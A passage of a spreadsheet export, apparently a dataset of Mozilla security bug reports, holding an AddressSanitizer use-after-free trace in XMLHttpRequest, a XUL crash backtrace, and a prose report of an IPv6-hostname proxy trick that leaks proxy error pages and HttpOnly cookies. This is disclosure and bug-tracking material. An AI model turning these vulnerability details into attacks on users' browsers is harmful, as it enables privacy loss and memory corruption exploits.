    #0 0x7f8f0918abba in mozilla::dom::XMLHttpRequestMainThread::DispatchProgressEvent(mozilla::DOMEventTargetHelper*, mozilla::dom::XMLHttpRequestMainThread::ProgressEventType, long, long) /builds/worker/workspace/build/src/dom/xhr/XMLHttpRequestMainThread.cpp:1227:26
    #1 0x7f8f091b3430 in mozilla::dom::XMLHttpRequestMainThread::HandleProgressTimerCallback() /builds/worker/workspace/build/src/dom/xhr/XMLHttpRequestMainThread.cpp
    #2 0x7f8f091b2e60 in mozilla::dom::XMLHttpRequestMainThread::Notify(nsITimer*) /builds/worker/workspace/build/src/dom/xhr/XMLHttpRequestMainThread.cpp:3400:5
    #3 0x7f8efee5dc51 in nsTimerImpl::Fire(int) /builds/worker/workspace/build/src/xpcom/threads/nsTimerImpl.cpp:562:40
    #4 0x7f8efee5cfba in nsTimerEvent::Run() /builds/worker/workspace/build/src/xpcom/threads/TimerThread.cpp:260:11
    #5 0x7f8efee35a15 in mozilla::SchedulerGroup::Runnable::Run() /builds/worker/workspace/build/src/xpcom/threads/SchedulerGroup.cpp:295:32
    #6 0x7f8efee75a56 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1180:14
    #7 0x7f8efee7d71d in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:486:10
    #8 0x7f8f001df7c4 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:110:5
    #9 0x7f8f000b4a9e in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:315:10
    #10 0x7f8f000b4a9e in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:308
    #11 0x7f8f000b4a9e in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:290
    #12 0x7f8f096a21b3 in nsBaseAppShell::Run() /builds/worker/workspace/build/src/widget/nsBaseAppShell.cpp:137:27
    #13 0x7f8f0dc6798e in XRE_RunAppShell() /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:919:20
    #14 0x7f8f000b4a9e in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:315:10
    #15 0x7f8f000b4a9e in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:308
    #16 0x7f8f000b4a9e in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:290
    #17 0x7f8f0dc66b1c in XRE_InitChildProcess(int, char**, XREChildData const*) /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:757:34
    #18 0x5645a6183834 in content_process_main /builds/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:56:28
    #19 0x5645a6183834 in main /builds/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:263
    #20 0x7f8f22d88b96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310
    #21 0x5645a60a8ebc in _start (/home/nils/browser/firefox/firefox/firefox+0x2debc)
0x6170000c26c3 is located 579 bytes inside of 688-byte region [0x6170000c2480,0x6170000c2730)
freed by thread T0 (Web Content) here:
    #0 0x5645a61509e2 in free /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:124:3
    #1 0x7f8efec38751 in SnowWhiteKiller::~SnowWhiteKiller() /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2416:7
    #2 0x7f8efec36e03 in nsCycleCollector::FreeSnowWhite(bool) /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2607:3
    #3 0x7f8efec437e2 in nsCycleCollector::BeginCollection(ccType, nsICycleCollectorListener*) /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3582:3
    #4 0x7f8efec42a75 in nsCycleCollector::Collect(ccType, js::SliceBudget&amp;, nsICycleCollectorListener*, bool) /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3411:9
    #5 0x7f8efec47b16 in nsCycleCollector_collect(nsICycleCollectorListener*) /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3947:21
    #6 0x7f8f036c0b8a in nsJSContext::CycleCollectNow(nsICycleCollectorListener*) /builds/worker/workspace/build/src/dom/base/nsJSEnvironment.cpp:1413:3
    #7 0x7f8f0604ef69 in mozilla::dom::FuzzingFunctions_Binding::cycleCollect(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/FuzzingFunctionsBinding.cpp:66:3
    #8 0x7f8f0df517c7 in CallJSNative /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:442:13
    #9 0x7f8f0df517c7 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:534
    #10 0x7f8f0f118e1d in js::jit::DoCallFallback(JSContext*, js::jit::BaselineFrame*, js::jit::ICCall_Fallback*, unsigned int, JS::Value*, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/jit/BaselineIC.cpp:3858:10
    #11 0x1cf31cd64887  (&lt;unknown module&gt;)
    #12 0x6210006391ff  (&lt;unknown module&gt;)
    #13 0x1cf31cd624de  (&lt;unknown module&gt;)
    #14 0x7f8f0f30f641 in EnterBaseline /builds/worker/workspace/build/src/js/src/jit/BaselineJIT.cpp:111:5
    #15 0x7f8f0f30f641 in js::jit::EnterBaselineAtBranch(JSContext*, js::InterpreterFrame*, unsigned char*) /builds/worker/workspace/build/src/js/src/jit/BaselineJIT.cpp:189
    #16 0x7f8f0df41b4d in Interpret(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:1982:24
    #17 0x7f8f0df1bbe8 in js::RunScript(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:422:10
    #18 0x7f8f0df52138 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:562:13
    #19 0x7f8f0df53d82 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:605:8
    #20 0x7f8f0eb99e99 in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/jsapi.cpp:2621:10
    #21 0x7f8f05d44e10 in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, mozilla::dom::Event&amp;, JS::MutableHandle&lt;JS::Value&gt;, mozilla::ErrorResult&amp;) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:266:37
    #22 0x7f8f07014df2 in Call&lt;nsCOMPtr&lt;mozilla::dom::EventTarget&gt; &gt; /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:363:12
    #23 0x7f8f07014df2 in mozilla::JSEventHandler::HandleEvent(mozilla::dom::Event*) /builds/worker/workspace/build/src/dom/events/JSEventHandler.cpp:205
    #24 0x7f8f06fc4c4a in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, mozilla::dom::Event*, mozilla::dom::EventTarget*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1045:22
    #25 0x7f8f06fc7281 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, mozilla::dom::Event**, mozilla::dom::EventTarget*, nsEventStatus*, bool) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1240:17
    #26 0x7f8f06fa73f0 in HandleEvent /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/EventListenerManager.h:355:5
    #27 0x7f8f06fa73f0 in mozilla::EventTargetChainItem::HandleEvent(mozilla::EventChainPostVisitor&amp;, mozilla::ELMCreationDetector&amp;) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:349
    #28 0x7f8f06fa5618 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray&lt;mozilla::EventTargetChainItem&gt;&amp;, mozilla::EventChainPostVisitor&amp;, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&amp;) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:551:16
    #29 0x7f8f06fac383 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, mozilla::dom::Event*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray&lt;mozilla::dom::EventTarget*&gt;*) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:1046:11
    #30 0x7f8f06fb40a6 in mozilla::EventDispatcher::DispatchDOMEvent(nsISupports*, mozilla::WidgetEvent*, mozilla::dom::Event*, nsPresContext*, nsEventStatus*) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp
    #31 0x7f8f06f5e770 in mozilla::DOMEventTargetHelper::DispatchEvent(mozilla::dom::Event&amp;, mozilla::dom::CallerType, mozilla::ErrorResult&amp;) /builds/worker/workspace/build/src/dom/events/DOMEventTargetHelper.cpp:166:17
    #32 0x7f8f06fd9b8a in mozilla::dom::EventTarget::DispatchEvent(mozilla::dom::Event&amp;) /builds/worker/workspace/build/src/dom/events/EventTarget.cpp:178:13
    #33 0x7f8f0918a909 in mozilla::dom::XMLHttpRequestMainThread::DispatchProgressEvent(mozilla::DOMEventTargetHelper*, mozilla::dom::XMLHttpRequestMainThread::ProgressEventType, long, long) /builds/worker/workspace/build/src/dom/xhr/XMLHttpRequestMainThread.cpp:1224:3
previously allocated by thread T0 (Web Content) here:
    #0 0x5645a6150d63 in __interceptor_malloc /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:146:3
    #1 0x5645a61855fd in moz_xmalloc /builds/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:68:15
    #2 0x7f8f09179593 in operator new /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:131:10
    #3 0x7f8f09179593 in mozilla::dom::XMLHttpRequest::Constructor(mozilla::dom::GlobalObject const&amp;, mozilla::dom::MozXMLHttpRequestParameters const&amp;, mozilla::ErrorResult&amp;) /builds/worker/workspace/build/src/dom/xhr/XMLHttpRequest.cpp:45
    #4 0x7f8f059d5cbc in mozilla::dom::XMLHttpRequest_Binding::_constructor(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/XMLHttpRequestBinding.cpp:2553:64
    #5 0x7f8f0df54a2f in CallJSNative /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:442:13
    #6 0x7f8f0df54a2f in CallJSNativeConstructor /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:458
    #7 0x7f8f0df54a2f in InternalConstruct(JSContext*, js::AnyConstructArgs const&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:651
    #8 0x7f8f0df399af in Interpret(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3066:16
    #9 0x7f8f0df1bbe8 in js::RunScript(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:422:10
    #10 0x7f8f0df52138 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:562:13
    #11 0x7f8f0df53d82 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:605:8
    #12 0x7f8f0eb99e99 in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/jsapi.cpp:2621:10
    #13 0x7f8f05d44e10 in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, mozilla::dom::Event&amp;, JS::MutableHandle&lt;JS::Value&gt;, mozilla::ErrorResult&amp;) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:266:37
    #14 0x7f8f07014df2 in Call&lt;nsCOMPtr&lt;mozilla::dom::EventTarget&gt; &gt; /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:363:12
    #15 0x7f8f07014df2 in mozilla::JSEventHandler::HandleEvent(mozilla::dom::Event*) /builds/worker/workspace/build/src/dom/events/JSEventHandler.cpp:205
    #16 0x7f8f06fc4c4a in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, mozilla::dom::Event*, mozilla::dom::EventTarget*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1045:22
    #17 0x7f8f06fc7223 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, mozilla::dom::Event**, mozilla::dom::EventTarget*, nsEventStatus*, bool) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1240:17
    #18 0x7f8f06fa73f0 in HandleEvent /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/EventListenerManager.h:355:5
    #19 0x7f8f06fa73f0 in mozilla::EventTargetChainItem::HandleEvent(mozilla::EventChainPostVisitor&amp;, mozilla::ELMCreationDetector&amp;) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:349
    #20 0x7f8f06fa5618 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray&lt;mozilla::EventTargetChainItem&gt;&amp;, mozilla::EventChainPostVisitor&amp;, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&amp;) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:551:16
    #21 0x7f8f06fac383 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, mozilla::dom::Event*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray&lt;mozilla::dom::EventTarget*&gt;*) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:1046:11
    #22 0x7f8f09f589ba in nsDocumentViewer::LoadComplete(nsresult) /builds/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:1098:7
    #23 0x7f8f0cdc3d8c in nsDocShell::EndPageLoad(nsIWebProgress*, nsIChannel*, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:6596:21
    #24 0x7f8f0cdc2eb8 in nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:6397:7
    #25 0x7f8f0cdc8a27 in non-virtual thunk to nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp
    #26 0x7f8f01a51c25 in nsDocLoader::DoFireOnStateChange(nsIWebProgress*, nsIRequest*, int&amp;, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:1313:3
    #27 0x7f8f01a5080c in nsDocLoader::doStopDocumentLoad(nsIRequest*, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:872:14
    #28 0x7f8f01a4b957 in nsDocLoader::DocLoaderIsEmpty(bool) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:710:9
    #29 0x7f8f01a4ea55 in nsDocLoader::OnStopRequest(nsIRequest*, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:598:5
    #30 0x7f8f01a50334 in non-virtual thunk to nsDocLoader::OnStopRequest(nsIRequest*, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp
    #31 0x7f8eff11e6b2 in mozilla::net::nsLoadGroup::RemoveRequest(nsIRequest*, nsISupports*, nsresult) /builds/worker/workspace/build/src/netwerk/base/nsLoadGroup.cpp:568:22
    #32 0x7f8f032f68ca in DoUnblockOnload /builds/worker/workspace/build/src/dom/base/Document.cpp:7821:18
    #33 0x7f8f032f68ca in mozilla::dom::Document::UnblockOnload(bool) /builds/worker/workspace/build/src/dom/base/Document.cpp:7753
    #34 0x7f8f032f532f in mozilla::dom::Document::DispatchContentLoadedEvents() /builds/worker/workspace/build/src/dom/base/Document.cpp:4873:3
    #35 0x7f8f033fa8db in applyImpl&lt;mozilla::dom::Document, void (mozilla::dom::Document::*)()&gt; /builds/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:1122:12
    #36 0x7f8f033fa8db in apply&lt;mozilla::dom::Document, void (mozilla::dom::Document::*)()&gt; /builds/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:1128
    #37 0x7f8f033fa8db in mozilla::detail::RunnableMethodImpl&lt;mozilla::dom::Document*, void (mozilla::dom::Document::*)(), true, (mozilla::RunnableKind)0&gt;::Run() /builds/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:1174
SUMMARY: AddressSanitizer: heap-use-after-free /builds/worker/workspace/build/src/dom/xhr/XMLHttpRequestMainThread.cpp:1227:26 in mozilla::dom::XMLHttpRequestMainThread::DispatchProgressEvent(mozilla::DOMEventTargetHelper*, mozilla::dom::XMLHttpRequestMainThread::ProgressEventType, long, long)
Shadow bytes around the buggy address:
  0x0c2e80010480: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c2e80010490: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c2e800104a0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c2e800104b0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c2e800104c0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
=&gt;0x0c2e800104d0: fd fd fd fd fd fd fd fd[fd]fd fd fd fd fd fd fd
  0x0c2e800104e0: fd fd fd fd fd fd fa fa fa fa fa fa fa fa fa fa
  0x0c2e800104f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c2e80010500: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c2e80010510: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c2e8001052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20801==ABORTING</t>
        </is>
      </c>
      <c r="X5626" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5627">
      <c r="A5627" t="n">
        <v>495444</v>
      </c>
      <c r="B5627" t="inlineStr">
        <is>
          <t>2009-05-29 07:25:56 -0700</t>
        </is>
      </c>
      <c r="C5627" t="inlineStr">
        <is>
          <t>nsXULTemplateBuilder::AttributeChanged calls Rebuild when nsContentUtils::IsSafeToRunScripts returns false</t>
        </is>
      </c>
      <c r="D5627" t="inlineStr">
        <is>
          <t>2009-09-13 12:44:05 -0700</t>
        </is>
      </c>
      <c r="E5627" t="n">
        <v>1</v>
      </c>
      <c r="F5627" t="n">
        <v>1</v>
      </c>
      <c r="G5627" t="n">
        <v>3</v>
      </c>
      <c r="H5627" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5627" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5627" t="inlineStr">
        <is>
          <t>XUL</t>
        </is>
      </c>
      <c r="K5627" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5627" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5627" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N5627" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5627" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5627" t="inlineStr">
        <is>
          <t>[sg:moderate?]</t>
        </is>
      </c>
      <c r="Q5627" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5627" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5627" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5627" t="n">
        <v>1</v>
      </c>
      <c r="U5627" t="n">
        <v>0</v>
      </c>
      <c r="V5627" t="n">
        <v>24</v>
      </c>
      <c r="W5627" t="inlineStr">
        <is>
          <t>Created attachment 380424
patch
#7  0x00002aaab0b55a3e in nsJSContext::EvaluateStringWithValue (this=0x2144780, aScript=@0x7fff28ccedd0, 
    aScopeObject=0x1f88c80, aPrincipal=0x7a09c0, aURL=0x2212548 "chrome://global/content/bindings/listbox.xml", aLineNo=217, 
    aVersion=180, aRetValue=0x7fff28ccedf0, aIsUndefined=0x7fff28ccedfc)
    at /home/smaug/mozilla/mozilla_cvs/hg/mozilla/dom/base/nsJSEnvironment.cpp:1450
#8  0x00002aaab0b1467e in nsXBLProtoImplField::InstallField (this=0x2a64560, aContext=&lt;value optimized out&gt;, 
    aBoundNode=0x1f88c80, aPrincipal=0x7a09c0, aBindingDocURI=&lt;value optimized out&gt;, aDidInstall=0x7fff28ccee8c)
    at /home/smaug/mozilla/mozilla_cvs/hg/mozilla/content/xbl/src/nsXBLProtoImplField.cpp:135
#9  0x00002aaab0b07bad in XBLResolve (cx=0x21447e0, obj=&lt;value optimized out&gt;, id=&lt;value optimized out&gt;, 
    flags=&lt;value optimized out&gt;, objp=0x7fff28ccef28)
    at /home/smaug/mozilla/mozilla_cvs/hg/mozilla/content/xbl/src/nsXBLBinding.cpp:211
#10 0x00002aaaaad9efad in js_LookupPropertyWithFlags (cx=0x21447e0, obj=&lt;value optimized out&gt;, id=32533796, flags=5, 
    objp=0x7fff28ccef90, propp=0x7fff28ccef88) at /home/smaug/mozilla/mozilla_cvs/hg/mozilla/js/src/jsobj.cpp:3848
#11 0x00002aaaaada706d in js_GetPropertyHelper (cx=0x21447e0, obj=0x1f88c80, id=32533796, cacheResult=1, vp=0x7fff28ccf238)
    at /home/smaug/mozilla/mozilla_cvs/hg/mozilla/js/src/jsobj.cpp:4255
#12 0x00002aaaaad761ea in js_Interpret (cx=0x21447e0) at /home/smaug/mozilla/mozilla_cvs/hg/mozilla/js/src/jsinterp.cpp:4441
#13 0x00002aaaaad906a3 in js_Invoke (cx=0x21447e0, argc=1, vp=0x3010a38, flags=&lt;value optimized out&gt;)
    at /home/smaug/mozilla/mozilla_cvs/hg/mozilla/js/src/jsinterp.cpp:1394
#14 0x00002aaab0248275 in nsXPCWrappedJSClass::CallMethod (this=0x215c3e0, wrapper=&lt;value optimized out&gt;, methodIndex=4, 
    info=0x1108600, nativeParams=0x7fff28ccf780)
    at /home/smaug/mozilla/mozilla_cvs/hg/mozilla/js/src/xpconnect/src/xpcwrappedjsclass.cpp:1652
#15 0x00002aaaab2d326e in PrepareAndDispatch (self=0x215c4b0, methodIndex=&lt;value optimized out&gt;, args=&lt;value optimized out&gt;, 
    gpregs=0x7fff28ccf860, fpregs=0x7fff28ccf890)
    at /home/smaug/mozilla/mozilla_cvs/hg/mozilla/xpcom/reflect/xptcall/src/md/unix/xptcstubs_x86_64_linux.cpp:153
#16 0x00002aaaab2d260b in SharedStub ()
    at /home/smaug/mozilla/mozilla_cvs/hg/mozilla/xpcom/reflect/xptinfo/src/xptiprivate.h:383
#17 0x00002aaab0c8f5eb in nsXULTemplateBuilder::Rebuild (this=0x305b980)
    at /home/smaug/mozilla/mozilla_cvs/hg/mozilla/content/xul/templates/src/nsXULTemplateBuilder.cpp:400
#18 0x00002aaab0c94e05 in nsXULTemplateBuilder::AttributeChanged (this=0x3df8, aDocument=0x303d900, aContent=0x6, 
    aNameSpaceID=-1, aAttribute=0x0, aModType=0, aStateMask=0)
    at /home/smaug/mozilla/mozilla_cvs/hg/mozilla/content/xul/templates/src/nsXULTemplateBuilder.cpp:1112
#19 0x00002aaab09ccfd2 in nsNodeUtils::AttributeChanged (aContent=0x30afb80, aNameSpaceID=0, aAttribute=0xb8edb8, 
    aModType=2, aStateMask=0) at /home/smaug/mozilla/mozilla_cvs/hg/mozilla/content/base/src/nsNodeUtils.cpp:108
#20 0x00002aaab09bbf75 in nsGenericElement::SetAttrAndNotify (this=0x30afb80, aNamespaceID=0, aName=0xb8edb8, aPrefix=0x0, 
    aOldValue=@0x7fff28ccfd80, aParsedValue=&lt;value optimized out&gt;, aModification=0, aFireMutation=0, aNotify=1, 
    aValueForAfterSetAttr=0x7fff28ccfee0)
    at /home/smaug/mozilla/mozilla_cvs/hg/mozilla/content/base/src/nsGenericElement.cpp:4369
#21 0x00002aaab09bc301 in nsGenericElement::SetAttr (this=0x30afb80, aNamespaceID=0, aName=0xb8edb8, aPrefix=0x0, 
    aValue=@0x7fff28ccfee0, aNotify=1)
    at /home/smaug/mozilla/mozilla_cvs/hg/mozilla/content/base/src/nsGenericElement.cpp:4300
#22 0x00002aaab09b5d95 in nsGenericElement::SetAttribute (this=0x30afb80, aName=@0x7fff28ccff00, aValue=@0x7fff28ccfee0)</t>
        </is>
      </c>
      <c r="X5627" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5628">
      <c r="A5628" t="n">
        <v>504014</v>
      </c>
      <c r="B5628" t="inlineStr">
        <is>
          <t>2009-07-13 20:59:35 -0700</t>
        </is>
      </c>
      <c r="C5628" t="inlineStr">
        <is>
          <t>Requests using IPv6 hostname syntax through HTTP proxies may generate errors</t>
        </is>
      </c>
      <c r="D5628" t="inlineStr">
        <is>
          <t>2023-09-02 08:36:52 -0700</t>
        </is>
      </c>
      <c r="E5628" t="n">
        <v>1</v>
      </c>
      <c r="F5628" t="n">
        <v>1</v>
      </c>
      <c r="G5628" t="n">
        <v>3</v>
      </c>
      <c r="H5628" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5628" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5628" t="inlineStr">
        <is>
          <t>Networking</t>
        </is>
      </c>
      <c r="K5628" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5628" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5628" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5628" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5628" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5628" t="inlineStr">
        <is>
          <t>[sg:low]</t>
        </is>
      </c>
      <c r="Q5628" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5628" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5628" t="inlineStr">
        <is>
          <t>mozilla7</t>
        </is>
      </c>
      <c r="T5628" t="n">
        <v>1</v>
      </c>
      <c r="U5628" t="n">
        <v>0</v>
      </c>
      <c r="V5628" t="n">
        <v>25</v>
      </c>
      <c r="W5628" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9.0.11) Gecko/2009060214 Firefox/3.0.11
Build Identifier: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.1pre) Gecko/20090713 Shiretoko/3.5.1pre
In Firefox, it is possible to make requests using IPv6 syntax (http://[example.com]/) via XMLHttpRequest objects.  If an HTTP proxy has been configured, the request will be handled by the proxy.
Depending on the proxy implementation a number of possible errors may occur.  For example, the proxy may not be prepared to handle the IPv6 syntax and will incorrectly parse the request leading to an error.
Error messages from HTTP proxies often include sensitive network diagnostic information such as client IP addresses, internal hostnames, email addresses and possibly a copy of the HTTP request.  
Because http://example.com/ and http://[example.com]/ are same origin, the XMLHttpRequest object can be used to read this information from the response.
A remote site may be able to construct such requests in order to reduce a user's privacy.  Additionally, if a copy of the HTTP request is included in the error response, it may be possible to read cookies marked as HttpOnly in XSS situations.
Reproducible: Always
Steps to Reproduce:
1. Configure HTTP proxy
2. Visit listed URL
3. Run test
Tested with squid-cache proxy (squid/3.0.STABLE16) with default configuration.</t>
        </is>
      </c>
      <c r="X5628" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5629">
      <c r="A5629" t="n">
        <v>849080</v>
      </c>
      <c r="B5629" t="inlineStr">
        <is>
          <t>2013-03-07 18:25:03 -0800</t>
        </is>
      </c>
      <c r="C5629" t="inlineStr">
        <is>
          <t>Use transactions for the API</t>
        </is>
      </c>
      <c r="D5629" t="inlineStr">
        <is>
          <t>2013-03-13 10:01:27 -0700</t>
        </is>
      </c>
      <c r="E5629" t="n">
        <v>1</v>
      </c>
      <c r="F5629" t="n">
        <v>1</v>
      </c>
      <c r="G5629" t="n">
        <v>6</v>
      </c>
      <c r="H5629" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I5629" t="inlineStr">
        <is>
          <t>Marketplace Graveyard</t>
        </is>
      </c>
      <c r="J5629" t="inlineStr">
        <is>
          <t>API</t>
        </is>
      </c>
      <c r="K5629" t="inlineStr">
        <is>
          <t>1.3</t>
        </is>
      </c>
      <c r="L5629" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5629" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
